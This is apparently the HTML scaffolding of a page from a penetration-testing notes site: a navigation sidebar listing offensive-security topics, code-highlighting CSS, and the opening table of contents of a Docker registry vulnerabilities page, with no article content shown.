419 lines
44 KiB
HTML
419 lines
44 KiB
HTML
<!doctype html>
|
|
<html lang="en">
|
|
<center>
|
|
<head>
|
|
|
|
|
|
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
|
|
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
|
|
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
|
|
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
|
|
<script type="text/javascript" src="/static/js/search.js"></script>
|
|
<link rel="stylesheet" href="/static/stylesheet.css">
|
|
<link rel="stylesheet" href="/static/auto-complete.css">
|
|
<br>
|
|
<title>The Real Hugo</title>
|
|
<meta name="viewport" content="width=device-width, initial-scale=1">
|
|
|
|
|
|
</head>
|
|
<body>
|
|
<!-- topmenu -->
|
|
<div class="menu">
|
|
<a href="/" style="text-decoration:none">Husk</a>
|
|
</div>
|
|
<div class="search-container">
|
|
<label for="search-by"><i class="fas fa-search"></i></label>
|
|
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
|
|
<!--button type="submit"><i class="search"></i>🔍</button>-->
|
|
<span data-search-clear=""><i class="fas fa-times"></i></span>
|
|
</div>
|
|
|
|
</div>
|
|
<div class="menu">
|
|
</div>
|
|
<!--br><br-->
|
|
</center>
|
|
<p></p>
|
|
<div class="columns">
|
|
<!-- Sidebar -->
|
|
<div class="column column-1">
|
|
<ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="linkClick(this); return false;" ><summary>Canary_bypass</summary><ul><li><a href="/exploit/binaries/canary_bypass/canary_bypass.html">canary_bypass</a></li></ul></details><details id=format_string ontoggle="linkClick(this); return false;" ><summary>Format_string</summary><ul><li><a href="/exploit/binaries/format_string/format_string.html">format_string</a></li></ul></details><details id=integral_promotion ontoggle="linkClick(this); return false;" ><summary>Integral_promotion</summary><ul><li><a href="/exploit/binaries/integral_promotion/integral_promotion.html">integral_promotion</a></li></ul></details><li><a href="/exploit/binaries/plt_got.html">plt_got</a></li><li><a href="/exploit/binaries/r2.html">r2</a></li><li><a href="/exploit/binaries/ret2libc.html">ret2libc</a></li></ul></details><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exploit/dns/zone_transfer.html">zone_transfer</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><li><a href="/exploit/hashes/collision.html">collision</a></li></ul></details><details id=imagemagick ontoggle="linkClick(this); return false;" ><summary>Imagemagick</summary><ul><li><a href="/exploit/imagemagick/imagetragick.html">imagetragick</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><details id=OGNL ontoggle="linkClick(this); return false;" ><summary>OGNL</summary><ul><li><a href="/exploit/java/OGNL/cve_2022_26134.html">cve_2022_26134</a></li></ul></details><li><a href="/exploit/java/ghidra_debug.html">ghidra_debug</a></li><li><a href="/exploit/java/ghostcat.html">ghostcat</a></li><li><a href="/exploit/java/log4shell.html">log4shell</a></li><li><a href="/exploit/java/spring4shell.html">spring4shell</a></li></ul></details><details id=level3_hypervisor ontoggle="linkClick(this); return false;" ><summary>Level3_hypervisor</summary><ul><details id=docker_sec ontoggle="linkClick(this); return false;" ><summary>Docker_sec</summary><ul><li><a href="/exploit/level3_hypervisor/docker_sec/docker.html">docker</a></li></ul></details><li><a href="/exploit/level3_hypervisor/kubernetes.html">kubernetes</a></li><li><a href="/exploit/level3_hypervisor/lxc.html">lxc</a></li><li><a href="/exploit/level3_hypervisor/microk8s.html">microk8s</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exploit/linux/capabilities.html">capabilities</a></li><details id=dirty_pipe ontoggle="linkClick(this); return false;" ><summary>Dirty_pipe</summary><ul><li><a href="/exploit/linux/dirty_pipe/dirty_pipe.html">dirty_pipe</a></li></ul></details><li><a href="/exploit/linux/exiftool.html">exiftool</a></li><li><a href="/exploit/linux/groups.html">groups</a></li><li><a href="/exploit/linux/ld_preload.html">ld_preload</a></li><li><a href="/exploit/linux/nfs_rootsquash.html">nfs_rootsquash</a></li><li><a href="/exploit/linux/overlayfs.html">overlayfs</a></li><details id=pkexec ontoggle="linkClick(this); return false;" ><summary>Pkexec</summary><ul><li><a href="/exploit/linux/pkexec/CVE_2021_4034.html">CVE_2021_4034</a></li></ul></details><li><a href="/exploit/linux/polkit.html">polkit</a></li><li><a href="/exploit/linux/racing_conditions.html">racing_conditions</a></li><li><a href="/exploit/linux/setcap.html">setcap</a></li><li><a href="/exploit/linux/shared_object_injection.html">shared_object_injection</a></li><li><a href="/exploit/linux/shell_shock.html">shell_shock</a></li><details id=sudo ontoggle="linkClick(this); return false;" ><summary>Sudo</summary><ul><li><a href="/exploit/linux/sudo/CVE_2019_14287.html">CVE_2019_14287</a></li><li><a href="/exploit/linux/sudo/CVE_2019_18634.html">CVE_2019_18634</a></li><li><a href="/exploit/linux/sudo/baron_samedit.html">baron_samedit</a></li><li><a href="/exploit/linux/sudo/tokens.html">tokens</a></li></ul></details><li><a href="/exploit/linux/wildard_exploitation.html">wildard_exploitation</a></li></ul></details><details id=macOS ontoggle="linkClick(this); return false;" ><summary>MacOS</summary><ul></ul></details><details id=network ontoggle="linkClick(this); return false;" ><summary>Network</summary><ul><li><a href="/exploit/network/mac_spoofing.html">mac_spoofing</a></li></ul></details><details id=padding ontoggle="linkClick(this); return false;" ><summary>Padding</summary><ul><li><a href="/exploit/padding/padbuster.html">padbuster</a></li></ul></details><details id=python ontoggle="linkClick(this); return false;" ><summary>Python</summary><ul><li><a href="/exploit/python/code_injection.html">code_injection</a></li><li><a href="/exploit/python/jail_escape.html">jail_escape</a></li><li><a href="/exploit/python/lib_hijack.html">lib_hijack</a></li><li><a href="/exploit/python/pickle.html">pickle</a></li><li><a href="/exploit/python/pwntools.html">pwntools</a></li><li><a href="/exploit/python/pyc.html">pyc</a></li><li><a href="/exploit/python/scapy.html">scapy</a></li></ul></details><details id=samba ontoggle="linkClick(this); return false;" ><summary>Samba</summary><ul><li><a href="/exploit/samba/smbmap.html">smbmap</a></li></ul></details><details id=sqli ontoggle="linkClick(this); return false;" ><summary>Sqli</summary><ul><li><a href="/exploit/sqli/mssql.html">mssql</a></li><li><a href="/exploit/sqli/no_sqli.html">no_sqli</a></li><li><a href="/exploit/sqli/sqli.html">sqli</a></li><li><a href="/exploit/sqli/sqlmap.html">sqlmap</a></li></ul></details><details id=ssl_tls ontoggle="linkClick(this); return false;" ><summary>Ssl_tls</summary><ul><li><a href="/exploit/ssl_tls/heartbleed.html">heartbleed</a></li></ul></details><details id=web ontoggle="linkClick(this); return false;" ><summary>Web</summary><ul><details id=bypass_rate_limiting ontoggle="linkClick(this); return false;" ><summary>Bypass_rate_limiting</summary><ul><li><a href="/exploit/web/bypass_rate_limiting/bypass_rate_limiting.html">bypass_rate_limiting</a></li></ul></details><li><a href="/exploit/web/command_injection.html">command_injection</a></li><details id=content_security_policy ontoggle="linkClick(this); return false;" ><summary>Content_security_policy</summary><ul><li><a href="/exploit/web/content_security_policy/content_security_policy.html">content_security_policy</a></li></ul></details><li><a href="/exploit/web/cookie_tampering.html">cookie_tampering</a></li><li><a href="/exploit/web/csrf.html">csrf</a></li><details id=forced_browsing ontoggle="linkClick(this); return false;" ><summary>Forced_browsing</summary><ul><li><a href="/exploit/web/forced_browsing/forced_browsing.html">forced_browsing</a></li></ul></details><li><a href="/exploit/web/http_header_injection.html">http_header_injection</a></li><details id=idor ontoggle="linkClick(this); return false;" ><summary>Idor</summary><ul><li><a href="/exploit/web/idor/idor.html">idor</a></li></ul></details><details id=javascript ontoggle="linkClick(this); return false;" ><summary>Javascript</summary><ul><li><a href="/exploit/web/javascript/bypass_filters.html">bypass_filters</a></li><li><a href="/exploit/web/javascript/prototype_pollution.html">prototype_pollution</a></li></ul></details><details id=jwt ontoggle="linkClick(this); return false;" ><summary>Jwt</summary><ul><li><a href="/exploit/web/jwt/jwt.html">jwt</a></li></ul></details><li><a href="/exploit/web/local_file_inclusion.html">local_file_inclusion</a></li><li><a href="/exploit/web/methodology.html">methodology</a></li><details id=nodejs ontoggle="linkClick(this); return false;" ><summary>Nodejs</summary><ul><li><a href="/exploit/web/nodejs/deserialization.html">deserialization</a></li></ul></details><details id=php ontoggle="linkClick(this); return false;" ><summary>Php</summary><ul><li><a href="/exploit/web/php/command_injection.html">command_injection</a></li><li><a href="/exploit/web/php/password_reset.html">password_reset</a></li><li><a href="/exploit/web/php/php_base64_filter.html">php_base64_filter</a></li><li><a href="/exploit/web/php/php_image_exif.html">php_image_exif</a></li><li><a href="/exploit/web/php/php_user_agent_rce.html">php_user_agent_rce</a></li><li><a href="/exploit/web/php/preload_lib.html">preload_lib</a></li><li><a href="/exploit/web/php/unserialize.html">unserialize</a></li></ul></details><li><a href="/exploit/web/re_registration.html">re_registration</a></li><li><a href="/exploit/web/remote_file_inclusion.html">remote_file_inclusion</a></li><details id=ssrf ontoggle="linkClick(this); return false;" ><summary>Ssrf</summary><ul><li><a href="/exploit/web/ssrf/iframe.html">iframe</a></li><li><a href="/exploit/web/ssrf/ssrf.html">ssrf</a></li></ul></details><details id=ssti ontoggle="linkClick(this); return false;" ><summary>Ssti</summary><ul><li><a href="/exploit/web/ssti/ssti.html">ssti</a></li></ul></details><li><a href="/exploit/web/url_forgery.html">url_forgery</a></li><li><a href="/exploit/web/wordpress.html">wordpress</a></li><li><a href="/exploit/web/xpath.html">xpath</a></li><li><a href="/exploit/web/xss.html">xss</a></li><details id=xxe ontoggle="linkClick(this); return false;" ><summary>Xxe</summary><ul><li><a href="/exploit/web/xxe/wp_xxe_.html">wp_xxe_</a></li><li><a href="/exploit/web/xxe/xml_external_entity.html">xml_external_entity</a></li></ul></details></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=Portable Executables ontoggle="linkClick(this); return false;" ><summary>Portable Executables</summary><ul><li><a href="/exploit/windows/Portable Executables/Shellcode.html">Shellcode</a></li></ul></details><details id=dll_hijacking ontoggle="linkClick(this); return false;" ><summary>Dll_hijacking</summary><ul><li><a href="/exploit/windows/dll_hijacking/dll_hijacking.html">dll_hijacking</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/windows/docs/always_installed_elevated.html">always_installed_elevated</a></li><li><a href="/exploit/windows/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/exploit/windows/docs/dpapi.html">dpapi</a></li><li><a href="/exploit/windows/docs/impacket.html">impacket</a></li><li><a href="/exploit/windows/docs/llmnr.html">llmnr</a></li><li><a href="/exploit/windows/docs/lnk_exploit.html">lnk_exploit</a></li><li><a href="/exploit/windows/docs/pass_the_hash.html">pass_the_hash</a></li><li><a href="/exploit/windows/docs/password_in_registry.html">password_in_registry</a></li><li><a href="/exploit/windows/docs/potatoes.html">potatoes</a></li><li><a href="/exploit/windows/docs/printnightmare.html">printnightmare</a></li><li><a href="/exploit/windows/docs/responder.html">responder</a></li><li><a href="/exploit/windows/docs/unquoted_path.html">unquoted_path</a></li></ul></details><details id=macros ontoggle="linkClick(this); return false;" ><summary>Macros</summary><ul><li><a href="/exploit/windows/macros/macros.html">macros</a></li></ul></details><details id=payloads ontoggle="linkClick(this); return false;" ><summary>Payloads</summary><ul><li><a href="/exploit/windows/payloads/windows_scripting_host.html">windows_scripting_host</a></li></ul></details><details id=print_nightmare ontoggle="linkClick(this); return false;" ><summary>Print_nightmare</summary><ul><details id=CVE-2021-1675 ontoggle="linkClick(this); return false;" ><summary>CVE-2021-1675</summary><ul><details id=nightmare-dll ontoggle="linkClick(this); return false;" ><summary>Nightmare-dll</summary><ul></ul></details></ul></details><li><a href="/exploit/windows/print_nightmare/print_nightmare.html">print_nightmare</a></li></ul></details><details id=process_injection ontoggle="linkClick(this); return false;" ><summary>Process_injection</summary><ul><li><a href="/exploit/windows/process_injection/dll_injection.html">dll_injection</a></li><li><a href="/exploit/windows/process_injection/process_hollowing.html">process_hollowing</a></li><li><a href="/exploit/windows/process_injection/shellcode_injection.html">shellcode_injection</a></li><li><a href="/exploit/windows/process_injection/thread_hijacking.html">thread_hijacking</a></li></ul></details><details id=service_escalation ontoggle="linkClick(this); return false;" ><summary>Service_escalation</summary><ul><li><a href="/exploit/windows/service_escalation/service_escalation.html">service_escalation</a></li></ul></details><details id=zero_logon ontoggle="linkClick(this); return false;" ><summary>Zero_logon</summary><ul><li><a href="/exploit/windows/zero_logon/zero_logon.html">zero_logon</a></li></ul></details></ul></details><details id=yaml ontoggle="linkClick(this); return false;" ><summary>Yaml</summary><ul><li><a href="/exploit/yaml/deserialization.html">deserialization</a></li></ul></details></ul></details><details id=forensics ontoggle="linkClick(this); return false;" ><summary>Forensics</summary><ul><li><a href="/forensics/ios.html">ios</a></li><li><a href="/forensics/kape.html">kape</a></li><li><a href="/forensics/ntfs.html">ntfs</a></li><li><a href="/forensics/oletools.html">oletools</a></li><li><a href="/forensics/volatility.html">volatility</a></li><li><a href="/forensics/windows_registry.html">windows_registry</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><details id=bruteforce ontoggle="linkClick(this); return false;" ><summary>Bruteforce</summary><ul><li><a href="/hashes/bruteforce/patator.html">patator</a></li></ul></details><li><a href="/hashes/generate_wordlists.html">generate_wordlists</a></li><li><a href="/hashes/haiti.html">haiti</a></li><li><a href="/hashes/hashcat_utils.html">hashcat_utils</a></li><details id=password_cracking ontoggle="linkClick(this); return false;" ><summary>Password_cracking</summary><ul><li><a href="/hashes/password_cracking/hydra.html">hydra</a></li><li><a href="/hashes/password_cracking/john.html">john</a></li><li><a href="/hashes/password_cracking/smb_challenge.html">smb_challenge</a></li><li><a href="/hashes/password_cracking/sucrack.html">sucrack</a></li><li><a href="/hashes/password_cracking/vnc.html">vnc</a></li></ul></details><details id=password_guessing ontoggle="linkClick(this); return false;" ><summary>Password_guessing</summary><ul><li><a href="/hashes/password_guessing/standard_passwords.html">standard_passwords</a></li></ul></details></ul></details><details id=persistence ontoggle="linkClick(this); return false;" ><summary>Persistence</summary><ul><li><a href="/persistence/bashrc.html">bashrc</a></li><li><a href="/persistence/crontab.html">crontab</a></li><li><a href="/persistence/meterpreter.html">meterpreter</a></li><li><a href="/persistence/persistence.html">persistence</a></li><li><a href="/persistence/wmi.html">wmi</a></li></ul></details><details id=post exploitation ontoggle="linkClick(this); return false;" ><summary>Post exploitation</summary><ul><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/bug_report.html">bug_report</a></li><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/feature_request.html">feature_request</a></li></ul></details></ul></details><li><a href="/post exploitation/Seatbelt/CHANGELOG.html">CHANGELOG</a></li><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=Commands ontoggle="linkClick(this); return false;" ><summary>Commands</summary><ul><details id=Windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=EventLogs ontoggle="linkClick(this); return false;" ><summary>EventLogs</summary><ul></ul></details></ul></details></ul></details><details id=Output ontoggle="linkClick(this); return false;" ><summary>Output</summary><ul></ul></details></ul></details></ul></details><details id=bc_security ontoggle="linkClick(this); return false;" ><summary>Bc_security</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/docs/c2.html">c2</a></li><li><a href="/post exploitation/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/post exploitation/docs/empire.html">empire</a></li><li><a href="/post exploitation/docs/ids_ips_evation.html">ids_ips_evation</a></li><li><a href="/post exploitation/docs/linux.html">linux</a></li><li><a href="/post exploitation/docs/metasploit.html">metasploit</a></li><li><a href="/post exploitation/docs/mimikatz.html">mimikatz</a></li><li><a href="/post exploitation/docs/mitm.html">mitm</a></li><li><a href="/post exploitation/docs/nfs_root_squash.html">nfs_root_squash</a></li><li><a href="/post exploitation/docs/powershell.html">powershell</a></li><li><a href="/post exploitation/docs/secretsdump.html">secretsdump</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/docs/windows/Signature-Evasion.html">Signature-Evasion</a></li><li><a href="/post exploitation/docs/windows/antivirus_evasion.html">antivirus_evasion</a></li><li><a href="/post exploitation/docs/windows/applocker.html">applocker</a></li><li><a href="/post exploitation/docs/windows/evade_event_tracing.html">evade_event_tracing</a></li><li><a href="/post exploitation/docs/windows/living_off_the_land.html">living_off_the_land</a></li><li><a href="/post exploitation/docs/windows/pass_the_hash.html">pass_the_hash</a></li><li><a href="/post exploitation/docs/windows/powershell_logs.html">powershell_logs</a></li><li><a href="/post exploitation/docs/windows/registry.html">registry</a></li><li><a href="/post exploitation/docs/windows/sebackupprivilege.html">sebackupprivilege</a></li><li><a href="/post exploitation/docs/windows/user_account_control.html">user_account_control</a></li></ul></details></ul></details><li><a href="/post exploitation/pivoting.html">pivoting</a></li><details id=priv_esc ontoggle="linkClick(this); return false;" ><summary>Priv_esc</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/docs/linux_priv_esc.html">linux_priv_esc</a></li><li><a href="/post exploitation/priv_esc/docs/pspy.html">pspy</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/priv_esc/docs/windows/add_user.html">add_user</a></li><li><a href="/post exploitation/priv_esc/docs/windows/windows_priv_esc.html">windows_priv_esc</a></li></ul></details></ul></details><details id=kernel-exploits ontoggle="linkClick(this); return false;" ><summary>Kernel-exploits</summary><ul></ul></details><details id=privesc-scripts ontoggle="linkClick(this); return false;" ><summary>Privesc-scripts</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/privesc-scripts/docs/get_script_onto_target.html">get_script_onto_target</a></li></ul></details></ul></details><details id=suid ontoggle="linkClick(this); return false;" ><summary>Suid</summary><ul></ul></details></ul></details></ul></details><details id=reverse engineering ontoggle="linkClick(this); return false;" ><summary>Reverse engineering</summary><ul><details id=android ontoggle="linkClick(this); return false;" ><summary>Android</summary><ul><li><a href="/reverse engineering/android/misc.html">misc</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse engineering/docs/deobfuscation.html">deobfuscation</a></li><li><a href="/reverse engineering/docs/dll_reversing.html">dll_reversing</a></li><li><a href="/reverse engineering/docs/firmware.html">firmware</a></li><li><a href="/reverse engineering/docs/function_mangling.html">function_mangling</a></li><li><a href="/reverse engineering/docs/scada.html">scada</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><li><a href="/reverse engineering/java/krakatau.html">krakatau</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/reverse engineering/windows/portable-executable.html">portable-executable</a></li></ul></details></ul></details><details id=reverse shells ontoggle="linkClick(this); return false;" ><summary>Reverse shells</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse shells/docs/evil-winrm.html">evil-winrm</a></li><li><a href="/reverse shells/docs/msfconsole.html">msfconsole</a></li><li><a href="/reverse shells/docs/msfvenom.html">msfvenom</a></li><li><a href="/reverse shells/docs/netcat.html">netcat</a></li><li><a href="/reverse shells/docs/powershell.html">powershell</a></li><li><a href="/reverse shells/docs/shell_upgrade.html">shell_upgrade</a></li><li><a href="/reverse shells/docs/socat.html">socat</a></li><li><a href="/reverse shells/docs/webshell.html">webshell</a></li></ul></details><li><a href="/reverse shells/firewalls.html">firewalls</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul></ul></details></ul></details>
|
|
</ul>
|
|
</div>
|
|
<div class="column column-2">
|
|
<span class="body">
|
|
<style>pre { line-height: 125%; }
|
|
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
.codehilite .hll { background-color: #2C3B41 }
|
|
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
|
|
.codehilite .err { color: #FF5370 } /* Error */
|
|
.codehilite .esc { color: #89DDFF } /* Escape */
|
|
.codehilite .g { color: #EEFFFF } /* Generic */
|
|
.codehilite .k { color: #BB80B3 } /* Keyword */
|
|
.codehilite .l { color: #C3E88D } /* Literal */
|
|
.codehilite .n { color: #EEFFFF } /* Name */
|
|
.codehilite .o { color: #89DDFF } /* Operator */
|
|
.codehilite .p { color: #89DDFF } /* Punctuation */
|
|
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
|
|
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
|
|
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
|
|
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
|
|
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
|
|
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
|
|
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
|
|
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
|
|
.codehilite .gr { color: #FF5370 } /* Generic.Error */
|
|
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
|
|
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
|
|
.codehilite .go { color: #546E7A } /* Generic.Output */
|
|
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
|
|
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
|
|
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
|
|
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
|
|
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
|
|
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
|
|
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
|
|
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
|
|
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
|
|
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
|
|
.codehilite .ld { color: #C3E88D } /* Literal.Date */
|
|
.codehilite .m { color: #F78C6C } /* Literal.Number */
|
|
.codehilite .s { color: #C3E88D } /* Literal.String */
|
|
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
|
|
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
|
|
.codehilite .nc { color: #FFCB6B } /* Name.Class */
|
|
.codehilite .no { color: #EEFFFF } /* Name.Constant */
|
|
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
|
|
.codehilite .ni { color: #89DDFF } /* Name.Entity */
|
|
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
|
|
.codehilite .nf { color: #82AAFF } /* Name.Function */
|
|
.codehilite .nl { color: #82AAFF } /* Name.Label */
|
|
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
|
|
.codehilite .nx { color: #EEFFFF } /* Name.Other */
|
|
.codehilite .py { color: #FFCB6B } /* Name.Property */
|
|
.codehilite .nt { color: #FF5370 } /* Name.Tag */
|
|
.codehilite .nv { color: #89DDFF } /* Name.Variable */
|
|
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
|
|
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
|
|
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
|
|
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
|
|
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
|
|
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
|
|
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
|
|
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
|
|
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
|
|
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
|
|
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
|
|
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
|
|
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
|
|
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
|
|
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
|
|
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
|
|
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
|
|
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
|
|
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
|
|
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
|
|
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
|
|
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
|
|
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
|
|
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
|
|
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
|
|
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
|
|
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
|
|
<div class="column column-3">
|
|
<ul>
|
|
<li><a href="#docker-vulnerabilities">Docker Vulnerabilities</a><ul>
|
|
<li><a href="#abusing-registry">Abusing Registry</a><ul>
|
|
<li><a href="#enumeration">Enumeration</a></li>
|
|
</ul>
|
|
</li>
|
|
